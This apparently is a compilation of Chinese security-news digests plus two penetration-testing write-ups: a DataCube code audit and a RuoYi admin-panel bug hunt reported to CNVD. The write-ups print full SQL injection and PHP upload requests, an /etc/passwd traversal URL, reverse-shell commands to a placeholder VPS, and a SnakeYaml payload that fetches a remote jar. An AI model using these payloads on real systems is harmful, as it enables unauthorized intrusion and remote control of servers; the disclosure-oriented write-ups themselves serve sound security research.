1、Check Point发布VPN零日漏洞的紧急修复 https://support.checkpoint.com/results/sk/sk182336 Check Point已发布针对此前在攻击中利用的VPN零日漏洞的热修复程序，该漏洞被用来远程访问防火墙并试图入侵企业网络。 周一，该公司首次警告VPN设备攻击激增，并分享了管理员如何保护其设备的建议。后来发现问题的根源是一个零日漏洞，黑客利用该漏洞对其客户进行攻击。该漏洞编号为CVE-2024-24919，是一个高严重性的信息泄露漏洞，使攻击者能够读取在暴露于互联网的Check Point安全网关上启用了远程访问VPN的某些信息。"该漏洞可能允许攻击者读取在互联网连接的网关上启用了远程访问 2、Okta警告Customer Identity Cloud可受到凭证填充攻击 https://sec.okta.com/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks Okta警告称，Customer Identity Cloud (CIC)中的跨源身份验证功能易受威胁行为者发起的凭证填充攻击。可疑活动始于2024年4月15日，公司表示已“主动”通知了启用该功能的客户。但未透露受到攻击影响的客户数量。凭证填充是一种网络攻击类型，对手尝试使用从之前的数据泄露、网络钓鱼或恶意软件活动中获得的用户名和密码列表登录在线服务。作为推荐的应对措施，用户被要求检查租 3、Moonstone Sleet组织与FakePenny勒索软件攻击有关联性 https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ 微软将其追踪的一个朝鲜黑客组织Moonstone Sleet与FakePenny勒索软件攻击联系起来，这些攻击导致数百万美元的赎金要求。虽然该威胁组织的战术、技术和程序（TTP）在很大程度上与其他朝鲜攻击者重叠，但它也逐渐采用了新的攻击方法以及其自定义的基础设施和工具。此前被追踪为Storm-17的Moonstone S 4、研究人员发布了高危Fortinet RCE的漏洞利用代码 https://www.fortiguard.com/psirt/FG-IR-23-130 安全研究人员已发布了Fortinet安全信息和事件管理（SIEM）解决方案的最高严重性漏洞的概念验证（PoC）利用代码，该漏洞已于今年二月修补。追踪编号为CVE-2024-23108，允许无需身份验证的远程命令执行并以root权限运行。“FortiSIEM主管中的多个操作系统命令中特殊元素中和不当漏洞[CWE-78]可能允许远程未经身份验证的攻击者通过精心构造的API请求执行未经授权的命令，”Fortinet表示。CVE-2024-23108影响FortiClient FortiSIEM 6.4.0及 5、处方管理公司Sav-Rx通报影响280万美国人的数据泄露事件 https://apps.web.maine.gov/online/aeviewer/ME/40/8912d568-e577-49a3-93ba-f9341533d332.shtml 处方管理公司Sav-Rx正在警告美国280多万人，他们的个人数据在2023年一次网络攻击中被盗。A&A Services，以Sav-Rx名义经营，是一家药品福利管理（PBM）公司，向美国各地的雇主、工会和其他组织提供处方药管理服务。上周五，该公司向缅因州总检察长办公室通报了2023年10月的一起网络安全事件，该事件暴露了2812336人的数据。“在2023年10月8日，我们发现了计算机网络的中断。因此，我们立即 6、专家发现了 macOS 版本的复杂 LightSpy 间谍软件 https://securityaffairs.com/163888/malware/lightspy-macos-version.html 研究人员发现 macOS 版本的 LightSpy 监视框架至少自 2024 年 1 月以来一直在野外活跃。 7、国际执法行动"终局行动"针对了多个僵尸网络 https://securityaffairs.com/163876/cyber-crime/operation-endgame.html 2024 年 5 月 27 日至 29 日，由欧洲刑警组织协调的代号为“终局行动”的国际执法行动，针对的是IcedID、SystemBC、Pikabot、Smokeloader、Bumblebee和Trickbot等恶意软件投放器。是有史以来针对僵尸网络的最大规模执法行动。 8、CISA 提醒联邦机构修补被利用的 Linux 内核漏洞 https://thehackernews.com/2024/05/cisa-alerts-federal-agencies-to-patch.html 美国网络安全和基础设施安全局 (CISA) 周四将影响 Linux 内核的安全漏洞添加到已知利用漏洞 ( KEV ) 目录中，并指出有证据显示该漏洞存在主动利用。该高严重性问题被标记为CVE-2024-1086（CVSS 评分：7.8），与 netfilter 组件中的释放后使用错误有关，该错误允许本地攻击者将权限从普通用户提升到 root 并可能执行任意代码。 9、互联网档案馆连续多日遭遇DDoS 攻击 https://www.theregister.com/2024/05/29/ddos_internet_archive/ 互联网档案馆自周日以来一直遭受分布式拒绝服务 (DDoS) 攻击，并且正在努力维持服务。攻击者每秒发起了“数以万计的虚假信息请求”。 10、新版本 Redline 木马使用 Lua 字节码逃避检测 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/ 近日，研究人员观察到 Redline Stealer 木马的新变种，开始利用 Lua 字节码逃避检测。根据遥测数据，Redline Stealer 木马已经日渐流行，覆盖北美洲、南美洲、欧洲和亚洲甚至大洋洲。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者滥用WordPress插件从电商网站窃取信用卡数据 https://blog.sucuri.net/2024/05/server-side-credit-card-skimmer-lodged-in-obscure-plugin.html 未知的威胁行为者正在滥用较少人知的WordPress代码片段插件，在受害者网站中插入恶意PHP代码，以收集信用卡数据。2024年5月11日，一场活动中滥用了名为Dessky Snippets的WordPress插件，该插件允许用户添加自定义PHP代码。目前有超过200个活跃安装。此类攻击通常利用先前披露的WordPress插件漏洞或容易猜到的凭证，获得管理员访问权限并安装其他插件（无论是合法的还是其他的）进 2、研究人员在Google Play上发现超过90个恶意Android应用 https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-google 研究人员在Google Play上发现了超过90个恶意Android应用程序，这些应用程序总共被安装了超过550万次，用于传播恶意软件和广告软件。其中，Anatsa银行木马最近活动激增。Anatsa（又称“Teabot”）是一种银行木马，针对欧洲、美国、英国和亚洲的650多家金融机构的应用程序。它试图窃取人们的电子银行凭证以进行欺诈交易。自去年底以来， 3、新型ShrinkLocker勒索软件使用BitLocker加密文件 https://usa.kaspersky.com/about/press-releases/2024_kaspersky-uncovers-new-bitlocker-abusing-ransomware 一种名为ShrinkLocker的新型勒索软件通过使用Windows BitLocker创建新的启动分区来加密企业系统的文件。ShrinkLocker之所以得名，是因为它通过缩小可用的非启动分区来创建启动卷。它已被用于攻击政府机构以及疫苗和制造业部门的公司。使用BitLocker加密计算机的勒索软件并不新鲜。一名威胁行为者曾使用Windows的这一安全功能加密了比利时一家医院40台服务器 4、研究人员警告滥用Cloudflare Workers服务的网络钓鱼活动 https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling 网络安全研究人员正在警告一种滥用Cloudflare Workers服务的网络钓鱼活动，该活动用于部署钓鱼网站，收集与Microsoft、Gmail、Yahoo!和cPanel Webmail相关的用户凭证。这种攻击方法称为透明钓鱼或中间人攻击（AitM）钓鱼，研究人员在一份报告中表示，“利用Cloudflare Workers充当合法登录页面的反向代理服务器，拦截受害者和登录页面之间的流 5、First American金融公司披露12月数据泄露影响44000人 https://www.sec.gov/Archives/edgar/data/1472787/000095017024065359/faf-20240521.htm First American Financial Corporation是美国第二大产权保险公司，该公司于周二披露，12月份的一次网络攻击导致44000人受影响。该公司成立于1889年，为房地产专业人士、购房者和卖方提供金融和结算服务，涉及住宅和商业物业交易。这家总部位于加利福尼亚的公司拥有超过21000名员工，去年总收入为60亿美元。该金融服务公司在12月21日发布的声明中透露了一些有关事件性质的少量细节。为了遏制网络攻击的 6、Eclipse ThreadX 中的漏洞可能导致代码执行 https://www.securityweek.com/vulnerabilities-in-eclipse-threadx-could-lead-to-code-execution/ Humanativa Group 发布了有关 Eclipse ThreadX（一种用于物联网设备的实时操作系统）中发现的多个漏洞的信息。 7、Check Point 警告其 VPN 网关产品可能遭受零日攻击 https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html Check Point 警告称，其网络安全网关产品中存在零日漏洞，威胁行为者已在野利用该漏洞。该问题被标记为CVE-2024-24919，影响 CloudGuard Network、Quantum Maestro、Quantum Scalable Chassis、Quantum Security Gateways 和 Quantum Spark 设备。 8、 BreachForums 在FBI执法行动后重新复活上线 https://securityaffairs.com/163841/cyber-crime/breachforums-resurrected-after-fbi-seizure.html 网络犯罪论坛 BreachForums 在执法行动查封其基础设施两周后重新恢复运行。 9、CatDDoS僵尸网络利用80多个已知安全漏洞发起 DDoS攻击 https://thehackernews.com/2024/05/researchers-warn-of-catddos-botnet-and.html 奇安信在过去3个月内发现名为CatDDoS 的恶意软件僵尸网络利用80多个漏洞对各类软件实施攻击，包括分布式拒绝服务 （DDoS） 攻击。奇安信X实验室团队发现，这些漏洞影响了Apache（ActiveMQ、Hadoop、Log4j 和 RocketMQ）、Cacti、Cisco、D-Link、DrayTek、FreePBX、GitLab、Gocloud、Huawei、Jenkins、Linksys、Metabase、NETGEAR、Re 10、俄罗斯最大快递公司CDEK遭黑客攻击，导致业务全面停摆 https://therecord.media/russian-delivery-company-cdek-down-cyberattack 近日，俄罗斯最大的快递公司之一 CDEK 遭遇了网络攻击负责，这次攻击导致该公司的服务中断数日。事件发生后，有一些自称 “Head Mare ”的俄语黑客声称对此次攻击负责，他们用勒索软件加密了该公司的服务器，并销毁了公司系统的备份副本。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

在这里分享一下通过拖取 DataCube 代码审计后发现的一些漏洞，包括前台的文件上传，信息泄露出账号密码，后台的文件上传。当然还有部分 SQL 注入漏洞，因为 DataCube 采用的是 SQLite 的数据库，所以SQL 注入相对来说显得就很鸡肋。当然可能还有没有发现的漏洞，可以互相讨论。 phpinfo 泄露 SQL注入 无回显的SQL注入 /DataCube/www/admin/setting_schedule.php SQLite 没有sleep()函数，但是可以用 randomblob(N) 来制造延时。randomblob(N)函数是SQLite数据库中的一个常用函数，它的作用是生成一个指定长度的随机二进制字符串。 正常请求时间 POST /admin/setting_schedule.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Connection: close datetime=2024-04-24+02%3A00'+or+randomblob(9000000000000000000000000)+and+'1&tbl_type=fs&delete=1 延时响应 判断对应的 SQLite 的版本号 POST /admin/setting_schedule.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close datetime=-1'or+(case+when(substr(sqlite_version(),1,1)<'4')+then+randomblob(900000000000000000000000000)+else+0+end)+and+'1&tbl_type=fs&delete=1 可以判断出SQLite的版本是3 有回显的SQL注入 POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close req_id=1) UNION ALL SELECT sqlite_version(),NULL,NULL-- 查询出 sqlite 的版本号 www\admin\pr_monitor\getting_index_data.php www\admin\pr_monitor\getting_screen_data.php#getData www\admin\pr_monitor\getting_screen_data.php#getMonitorItemList 信息泄露 www\admin\config_all.php 将从 SQLite3 数据库中获取的数据转换为一个 JSON 字符串，并输出在页面上 任意文件上传 www\admin\transceiver_schedule.php POST /admin/transceiver_schedule.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb8tU2iptV70lGozq User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryb8tU2iptV70lGozq Content-Disposition: form-data; name="upload_file"; filename="test1.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryb8tU2iptV70lGozq Content-Disposition: form-data; name="usb_schedule" 1 ------WebKitFormBoundaryb8tU2iptV70lGozq-- 后台任意文件上传 www\admin\setting_photo.php www\admin\setting_photo.php#insertPhoto www\admin\images.php 登录后获取参数 accesstime 的值 将值替换到数据包中 POST /admin/setting_photo.php HTTP/1.1 Content-Length: 414 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydzDlRcTHEmG3mohY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundarydzDlRcTHEmG3mohY Content-Disposition: form-data; name="add" 1 ------WebKitFormBoundarydzDlRcTHEmG3mohY Content-Disposition: form-data; name="addPhoto"; filename="test.php" Content-Type: image/jpeg <?php phpinfo(); ?> ------WebKitFormBoundarydzDlRcTHEmG3mohY Content-Disposition: form-data; name="accesstime" 0.05027100 1713945976 ------WebKitFormBoundarydzDlRcTHEmG3mohY-- 成功将文件上传到 /images/slideshow/ 目录下 尚未解决的后台SQL注入 类似的注入有很多，但是每一次都进行了 accesstime 的校验，所以需要不停的从页面上获取，这里仅从一处来进行探讨 www\admin\config_time_sync.php www\admin\Util.class.php#TblConfUpdate 我们很明显的可以看到这里的SQL 语句是我们可控的 首先请求页面 /admin/config_time_sync.php 来获取一个 accesstime 值 再构造请求进行发包 我们将执行的 SQL 语句打印出来 BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.enable';insert into tbl_conf values('ntp.enable', 'true');select randomblob(999900000000000000000000000);select ('1');COMMIT;BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.server';insert into tbl_conf values('ntp.server', 're-ene.energia.c 这里很奇怪，已经完美的闭合并提示执行成功，却没有执行这条语句，有明白的大佬可以一起讨论一下。

1、BLOODALCHEMY恶意软件针对南亚和东南亚政府发起攻击 https://blog-en.itochuci.co.jp/entry/2024/05/23/090000 网络安全研究人员发现，用于攻击南亚和东南亚政府组织的BLOODALCHEMY恶意软件实际上是Deed RAT的更新版本，后者被认为是ShadowPad的继任者。BLOODALCHEMY和Deed RAT的起源是ShadowPad，考虑到ShadowPad在众多APT攻击活动中的历史，特别关注这种恶意软件的使用趋势是至关重要的。BLOODALCHEMY首次是在2023年10月记录，当时与其追踪的REF5961入侵组织在东南亚国家联盟（ASEAN）国家的攻击活动有关。这是一个用C语言编写 2、攻击者利用木马化扫雷游戏的Python版本攻击金融组织 https://cert.gov.ua/article/6279419 黑客利用微软经典扫雷游戏的Python克隆代码，在针对欧洲和美国金融机构的攻击中隐藏恶意脚本。研究人员将这些攻击归因于被追踪为“UAC-0188”的威胁行为者，后者使用合法代码隐藏下载并安装SuperOps RMM的Python脚本。SuperOps RMM是一款合法的远程管理软件，能够使远程攻击者直接访问受感染系统。在最初发现此次攻击后，研究显示在欧洲和美国的金融和保险机构中，至少有五次潜在的入侵由相同的文件导致。 3、恶意谷歌推广广告利用新发布的Arc浏览器发起攻击 https://www.threatdown.com/blog/threat-actors-ride-the-hype-for-newly-released-arc-browser/ 与Arc浏览器Windows版发布同时进行的一场谷歌广告恶意软件活动，诱骗用户下载被植入木马的安装程序，从而感染恶意软件。Arc浏览器是一款具有创新用户界面设计的新型网络浏览器，与传统浏览器不同。在2023年7月发布macOS版本后，获得了科技媒体和用户的高度评价，其近期在Windows上的发布备受期待。网络犯罪分子为产品发布做了准备，在谷歌搜索上设置恶意广告，诱骗想要下载新浏览器的用户。谷歌的广告平台存在一个 4、Cencora遭遇数据泄露暴露了11家制药公司的美国患者信息 https://www.bleepingcomputer.com/news/security/cencora-data-breach-exposes-us-patient-info-from-11-drug-companies/ 由于Cencora在2024年2月遭受的网络攻击，一些全球最大的制药公司披露了数据泄露事件。Cencora是他们在制药和业务服务方面的合作伙伴。Cencora，前身为AmerisourceBergen，是一家专注于药品分销、特殊药房、咨询和临床试验支持的制药服务提供商。这家总部位于宾夕法尼亚州的公司在50个国家开展业务，拥有46000名员工，2023年收入为2620 5、微软Copilot在全球停机24小时后恢复正常 https://www.bleepingcomputer.com/news/microsoft/microsoft-copilot-fixed-worldwide-after-24-hour-outage/ 在超过24小时的停机后，微软的Bing、Copilot和Windows中的Copilot服务已在全球范围内恢复正常，但尚未发布有关导致问题的原因的信息。这次大规模停机始于周四凌晨3点（美国东部时间），主要影响亚洲和欧洲的用户，导致许多人无法访问这些服务。在停机期间，Bing.com显示空白页面或429 HTTP错误代码，但直接的Bing搜索仍然可用。微软在一天内不断分享更新，最初表示，“ 6、OpenAI 成立安全委员会，开始训练最新的人工智能模型 https://www.securityweek.com/openai-forms-safety-committee-as-it-starts-training-latest-artificial-intelligence-model/ OpenAI 正在成立一个新的安全委员会，并已开始训练一种新的人工智能模型，以取代其 ChatGPT 聊天机器人所依赖的 GPT-4 系统。 7、TP-Link 游戏路由器漏洞使用户面临远程代码攻击 https://thehackernews.com/2024/05/tp-link-gaming-router-vulnerability.html TP-Link Archer C5400X 游戏路由器被披露存在一个最高严重性安全漏洞，该漏洞可能通过发送特制的请求导致易受攻击的设备执行远程代码。该漏洞被标记为CVE-2024-5035，CVSS 评分为 10.0。它会影响路由器固件的所有版本，包括 1_1.1.6 及之前版本。该漏洞已在2024 年 5 月 24 日发布的1_1.1.7 版本中得到修补。 8、SingCERT 警告称，多个 WordPress 插件中发现严重漏洞 https://thecyberexpress.com/wordpress-plugin-vulnerabilities/ SingCERT 报告了 9 个严重的 WordPress 插件漏洞，并分享了缓解策略以避免被威胁行为者利用。 9、白宫宣布计划在年底前改革数据路由安全 https://www.nextgov.com/cybersecurity/2024/05/white-house-announces-plans-revamp-data-routing-security-year-end/396886/ 白宫网络官员周四表示，到今年年底，联邦机构拥有和使用的 50% 以上的 IP 地址将采用增强的数据路由安全措施，以帮助防止黑客劫持进入政府网络的数字通道。 10、印度军方和警方生物识别数据遭泄露 https://www.anquanke.com/post/id/296855 网络安全研究员 Jeremiah Fowler 发现并向WebsitePlanet报告了一个未受密码保护的数据库，其中包含 160 多万份文件，这些文件属于印度一家领先的生物特征认证解决方案提供商，该提供商在美国和澳大利亚设有办事处。暴露的记录包括警察、军队、教师和铁路工人的生物特征身份信息。同时，这些数据似乎可能在暗网相关的 Telegram 群组中出售。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

事件起因是因为要搞毕设了，在为这个苦恼，突然负责毕设的老师说得到cnvd下发的证书结合你的漏洞挖掘的过程是可以当成毕设的，当时又学习了一段时间的web渗透方面的知识，于是踏上了废寝忘食的cnvd证书漏洞挖掘的日子。 前言：听群友们说，一般可以获得cnvd事件型的证书要三大运营商、铁塔的漏洞，而且必须要高危的漏洞才可以获得证书，低危和中危都没有证书，交上去只能得到cnvd的漏洞编号，于是就朝着三大运营商、铁塔的高危漏洞去挖掘。 一、信息收集 信息收集的目的是了解目标的基本情况，包括网络拓扑结构、系统架构、运行的服务和应用程序、已知漏洞、潜在安全风险等。通过信息收集，渗透测试人员可以获得对目标的深入了解，从而确定可能的攻击矢量和漏洞利用路径，为后续的渗透测试工作做准备。 1、我一般先用奇安信的鹰图平台，使用里面搜索引擎的特定的语法搜索我要找的单位名或者关键字，精准定位。 鹰图平台：https://hunter.qianxin.com/ 经过一段时间的换各种关键字的搜索，终于发现了一个看着系统界面比较眼熟的界面，原谅我的厚码。。。 看着大概率是若依框架。 确定为vue前后端分离的若依管理系统。 二、历史漏洞分析 确定了这个系统是基于SpringBoot，Spring Security，JWT，Vue & Element 的前后端分离权限管理系统。 这是我第一次挖掘关于若依vue框架的系统，以前遇到的都是基于SpringBoot的权限管理系统，核心技术采用Spring、MyBatis、Shiro。 让我们先来看看若依的历史漏洞和解析：若依框架是一个 Java EE 企业级快速开发平台，基于经典技术组合（Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap），内置模块如：部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置；支持集群，支持多数据源，支持分布式事务。若依框架漏洞默认口令漏洞早期若依框架漏洞版本有反序列化漏洞 ，执行任意命令。 若依后台管理系统是基于SpringBoot、Spring Security、JWT、Vue & Element 的前后端分离权限管理系统，可用于包含网站管理后台、网站会员中心、CMS、CRM、OA等、的Web应用程序。若依后台管理系统存在未授权访问和文件上传高危漏洞，攻击者可利用该漏洞获取服务器控制权。 比较常见的历史漏洞： 1、前端存储账号密码或默认弱口令admin/admin123 2、Druid页面未授权访问 http://xxx//prod-api/druid/index.htmlhttp://xxx//dev-api/druid/index.htmlhttp://xxx//api/druid/index.htmlhttp://xxx//admin/druid/index.htmlhttp://xxx//admin-api/druid/index.html3、后台任意文件读取http://xxx/common/download/resource?resource/profile/…/…/…/…/etc/passwd 4、后台SQL注入漏洞位置在"系统管理"里中的"角色管理中"http://xxxxxxx/system/role/listhttp://xxxxxxx/system/dept/edithttp://xxxxxxx/system/role/exporthttp://xxxxxxx/tool/gen/createTable 5、shiro反序列化 若依管理系统使用了Apache Shiro，Shiro 提供了记住我（RememberMe）的功能，下次访问时无需再登录即可访问。系统将密钥硬编码在代码里，且在官方文档中并没有强调修改该密钥，导致框架使用者大多数都使用了默认密钥。 攻击者可以构造一个恶意的对象，并且对其序列化、AES加密、base64编码后，作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化，最终造成反序列化漏洞，进而在目标机器上执行任意命令。 众所周知的，网上大把工具撸就完事了https://github.com/SummerSec/ShiroAttack2 6、SnakeYaml组件漏洞-定时任务-RCE 定时任务对于传入的"调用目标字符串"没有任何校验，导致攻击者可以调用任意类、方法及参数触发反射执行命令。 RuoYi 触发 SnakeYaml 反序列化漏洞的漏洞点。漏洞点在后台 系统监控 > 定时任务 处，可以调用类的方法 系统会调用 com.ruoyi.quartz.util.JobInvokeUtil#invokeMethod 方法来处理系统任务 首先会获取需要执行的目标，即我们的 payload，再获取实例名和方法名以及方法参数 然后判断实例名是否是 带完全包名称的类名，如果不是的话，则调用 SpringUtils.getBean(beanName) 获得实例；如果是的话，则使用 Class.forName(beanName).newInstance() 获得实例 最后调用 invokeMethod(SysJob sysJob) 方法实现方法的调用 public static void invokeMethod(SysJob sysJob) throws Exception     {          String invokeTarget \= sysJob.getInvokeTarget();          String beanName \= getBeanName(invokeTarget);              String methodName \= getMethodName(invokeTarget);          List<Object\[\]> methodParams \= getMethodParams(invokeTarget);          if (!isValidClassName(beanName))         {              Object bean \= SpringUtils.getBean(beanName);              invokeMethod(bean, methodName, methodParams);         }          else         {              Object bean \= Class.forName(beanName).newInstance();              invokeMethod(bean, methodName, methodParams);         }     }   跟进 com.ruoyi.quartz.util.JobInvokeUtil#invokeMethod 可以看到这里通过 getDeclaredMethod 获得了类的方法，然后通过反射执行方法。 当我们传入的类名为完全包名称，需要满足三个条件才能正常使用 具有无参构造方法 调用的方法需要是类自身声明的方法，不能是他的父类方法 构造方法和调用的方法均为 public 而 org.yaml.snakeyaml.Yaml 是符合这些条件的，我们可以利用这个点去触发 SnakeYaml 反序列化漏洞。 三、正戏开始 要获得证书就得要挖掘到高危的漏洞，若依vue框架是没有shiro反序列化的，所以得进入后台去挖掘定时任务的RCE。 1、回到之前的找到若依的登录框，上来肯定是试一试默认的弱口令admin123。不出意外密码错误了 2、测试了一下，没有密码输入错误次数上限，就是输入错多少次都可以，也没有验证码验证登录，不用多说了，爆破启动！！！ 抱着试一试的态度，没想到真滴爆出来了 毕竟是第一次打若依vue框架的，我就把上面提到的漏洞都测试了一遍，没一个成功的（除了定时任务-RCE的漏洞没测试）。。。。。 3、我先去网上浏览一阵子的若依后台定时任务调用类的方法RCE的文章，开搞！！！ 首先先去Github上面找到大佬写好的项目生成恶意jar包：https://github.com/artsploit/yaml-payload先修改项目源码文件 src/artsploit/AwesomeScriptEngineFactory.java 执行Linux反弹shell命令 修改AwesomeScriptEngineFactory.java格式： Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/vpsIP/vps监听端口 0>&1"}); 在yaml-payload-master文件夹目录下编译AwesomeScriptEngineFactory.java文件 javac .\src\artsploit\AwesomeScriptEngineFactory.java 得到编译好的AwesomeScriptEngineFactory.class文件 把src目录打包成yaml-payload.jar文件 jar -cvf yaml-payload.jar -C .\src\ . 把打包好的yaml-payload.jar上传到vps上面，使用python命令开启临时的http网站：`python -m SimpleHTTPServer 8880 测试访问vps开启的网站 在vps上面使用nc监听设定的端口，反弹shell 回到若依系统后台，使用爆破出来的账号密码登录，进入系统监控-->定时任务-->新增，添加计划任务。 调用方法也没有什么限制，可以直接使用http。任务名随便写，调用方法：org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager \[ !!java.net.URLClassLoader \[\[ !!java.net.URL \["http://httpIP/yaml-payload.jar"\] \]\] \]') cron表达式：0/10 \* \* \* \* ? 点击确定 在多执行几次刚刚设置好的定时任务 在我满心欢喜的以为成功的时候，现实却给我当头一棒，nc监听一直没有动静，啊啊啊啊啊啊啊啊啊。。。。。又去多执行了几次也没有反弹到shell 去看刚刚vps使用python开启的http，没有访问响应gg。 想了想会不会是命令被系统拦截了或者是AwesomeScriptEngineFactory.java文件里面的命令错误执行不了。于是又去换了一种方式的反弹shell命令 重新修改AwesomeScriptEngineFactory.java格式：使用base64编码这个命令：bash -i >& /dev/tcp/vpsIP/vps监听端口 0>&1base64编码后的命令：YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNJUC92cHPnm5HlkKznq6/lj6MgMD4mMQ==AwesomeScriptEngineFactory.java格式：Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNJUC92cHPnm5HlkKznq6/lj6MgM 再按照上面的方法编译一遍，然后再打包成jar文件，再次上传到vps里面，把之前的删掉。 返回到若依管理系统，再次执行几次定时任务，不用更改。。。让命令飘一会。 pleasantly surprised。。。。gg了。 四、柳暗花明 我以为要下播的时候，去上了个厕所。。。。回来突然有灵感想到可不可以使用python命令来执行反弹shell命令呢，现在的服务器linux服务器基本都是自带python的，说干就干。 继续修改AwesomeScriptEngineFactory.java文件使用python的特性构造payload，修改的格式：Runtime.getRuntime().exec(new String\[\]{"python","-c","import os,socket,subprocess;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(('vpsIP',vps监听端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=su 如下图： 继续执行之前的步骤，按照上面的方法编译一遍，然后再打包成jar文件，再次上传到vps里面，把之前的删掉。 回到若依管理系统继续执行我们写入的定时任务。 结果芜湖！！！成功成功。 咱也不知道为什么。没拦截python？ 最后也是通过了cnvd的事件型高危 漏洞已上报厂家，厂家已修复。 修复建议：升级Ruoyi至最新版本。

1、Replicate AI服务漏洞可导致暴露客户模型和数据 https://www.wiz.io/blog/wiz-research-discovers-critical-vulnerability-in-replicate 网络安全研究人员发现了人工智能即服务提供商Replicate的一个关键安全漏洞，该漏洞可能允许威胁行为者访问专有的AI模型和敏感信息。利用这一漏洞可能允许未经授权访问所有Replicate平台客户的AI提示和结果。问题的根源在于AI模型通常以允许任意代码执行的格式打包，攻击者可以利用这种格式通过恶意模型执行跨租户攻击。Replicate使用一个名为Cog的开源工具来容器化和打包机器学习模型，这些模型可以在自托管环境中或部署到Re 2、攻击者在针对MITRE网络攻击中创建了恶意虚拟机来逃避检测 https://medium.com/mitre-engenuity/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion-4ea647b83f5b MITRE公司透露，在2023年12月底针对这家非营利公司的网络攻击中，黑客利用Ivanti Connect Secure (ICS)的零日漏洞，通过在其VMware环境中创建恶意虚拟机来进行攻击。对手在VMware环境中创建了自己的恶意虚拟机，利用了被攻陷的vCenter Server访问权限。攻击者在vCenter Server的Tomcat服务器下编写并部署了一个名为 3、研究人员披露假冒杀软网站传播安卓和Windows恶意软件 https://www.trellix.com/blogs/research/a-catalog-of-hazardous-av-sites-a-tale-of-malware-hosting/ 威胁行为者被发现利用假冒合法杀毒解决方案（如Avast、Bitdefender和Malwarebytes）的虚假网站传播恶意软件，这些恶意软件能够窃取安卓和Windows设备上的敏感信息。通过看似合法的网站托管恶意软件对普通消费者具有侵害性，尤其是那些希望保护设备免受网络攻击的人。这些网站包括：avast-securedownload[.]com，用于以Android软件包文件形式（"Avast.a 4、谷歌针对Chrome浏览器的零日漏洞推出了修复程序 https://thehackernews.com/2024/05/google-detects-4th-chrome-zero-day-in.html 